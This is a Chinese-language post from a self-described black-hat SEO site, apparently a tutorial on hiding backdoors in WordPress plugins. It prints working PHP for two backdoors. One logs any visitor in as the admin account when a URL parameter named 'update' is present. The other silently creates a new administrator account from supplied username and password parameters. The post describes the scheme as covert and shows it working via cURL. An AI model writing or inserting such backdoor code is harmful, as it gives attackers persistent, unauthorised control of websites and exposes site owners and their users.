黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

wordpress插件后门

  这种方案较为隐蔽,我们只要找到一个管理员账号,调用Wordpress API,实现自动登录即可。

  wordpress 插件之权限后门

  在测试环境中,我们只有 admin 一个账号。为了登录这个 账号,我们需要进行如下操作

  // 当带有 “update” 字样时就执行后门 if (! isset ($_GET[‘update’])) { return; } $user=get_user_by(‘login’, ‘admin’); if (! is_wp_error($user)) { // 清空当前认证信息 wp_clear_auth_cookie(); // 设置管理员的认证信息 wp_set_current_user($user->ID); wp_set_auth_cookie($user->ID); wordpress插件后门 // 跳转到管理后台 wp_safe_redirect(user_admin_url()); exit(); }

  我们登录服务器,将插件释放在 ,并激活插件

  wordpress 插件之权限后门

  激活后,就可以成功登录了。这里为了方便演示,用的cURL命令

  wordpress 插件之权限后门

  这个方法会根据用户输入的账号和密码,创建管理员账号。我们编写如下插件,安装到 WordPress 里,

  $__username=@$_REQUEST[‘__username’]; $__password=@$_REQUEST[‘__password’]; if (! isset ($__username) || ! isset ($__password) || username_exists ($__username)) { return; } // 创建用户 $user=wp_create_user($__username, $__password, “root@localhost.localdomain”); if (! is_wp_error($user)) { $user=get_user_by(‘login’, $__username); // 设置为管理员角色 $user->set_role(‘administrator’); exit(); }

  激活插件后,我们触发一下

  wordpress 插件之权限后门

  使用刚刚提交的账号密码,aka 登录,发现管理员账号已经添加成功了:

  wordpress 插件之权限后门

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » wordpress插件后门
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜